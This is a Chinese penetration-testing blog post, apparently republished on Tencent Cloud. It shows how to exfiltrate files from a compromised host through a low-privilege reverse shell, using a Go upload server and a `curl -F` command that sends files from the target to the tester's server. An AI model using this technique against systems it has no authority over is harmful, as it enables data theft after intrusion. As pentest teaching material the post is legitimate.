渗透测试|利用curl回传文件
至少我们曾经在一起过。
来自:一言
var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();
说明
现在有一种情况,反弹了一个低权限的shell[aru_17],然后该网站又没有web服务,然后用scp命令也是权限不够(需要验证密码),通过网上查询方法说使用 sshpass 可以进行带密码执行scp命令,但是需要安装这个命令,当前权限并不能安装该命令[aru_28],所以在大表哥的提示下,可以采用curl命令进行文件回传的操作。[aru_21]
条件
1.一台服务器(这个肯定要的[aru_13])
2.目标服务器能够执行curl命令。
方法
1.采用golang编写一个简单的获取文件上传的后端(用golang的话可以避免安装环境等操作,当然你也可以用别的语言来搞一个[aru_62])
点击查看后端源码
main.go文件
package main
import (
"flag"
"go-upload/runserver"
)
func main() {
filedir := flag.String("f", "", "保存路径")
lport := flag.String("p", "8088", "运行端口")
flag.Parse()
if *filedir != "" && *lport != "" {
runserver.Runserver(*filedir, *lport)
} else {
flag.Usage()
}
}root.go文件
package runserver
import (
"fmt"
"github.com/gin-gonic/gin"
"net/http"
)
/*
* @Author: A
* @Date: 2021/7/6 11:32
*/
func Runserver(filedir string, lport string) {
r := gin.Default()
b := filedir
r.POST("/upload", func(c *gin.Context) {
file, err := c.FormFile("file")
//fmt.Println(file.Filename)
s := b + "/" + file.Filename
if err != nil {
c.String(500, "err")
}
// c.JSON(200, gin.H{"message": file.Header.Context})
err = c.SaveUploadedFile(file, s)
if err != nil {
c.String(http.StatusOK, "err")
}
c.String(http.StatusOK, "ok")
})
r.Run(":" + lport)
}
2.curl命令参数(根据环境更改)
curl -F "file=@文件路径" http://localhost:8088/upload
##上传成功会回显ok
下载
上方提供了源码,如果懒得编译的可以直接下载。编译了windows和linux下64位的运行程序。
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-07-06,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
命令行工具
腾讯云命令行工具 TCCLI 是管理腾讯云资源的统一工具。使用腾讯云命令行工具,您可以快速调用腾讯云 API 来管理您的腾讯云资源。此外,您还可以基于腾讯云的命令行工具来做自动化和脚本处理,以更多样的方式进行组合和重用。
腾讯云开发者
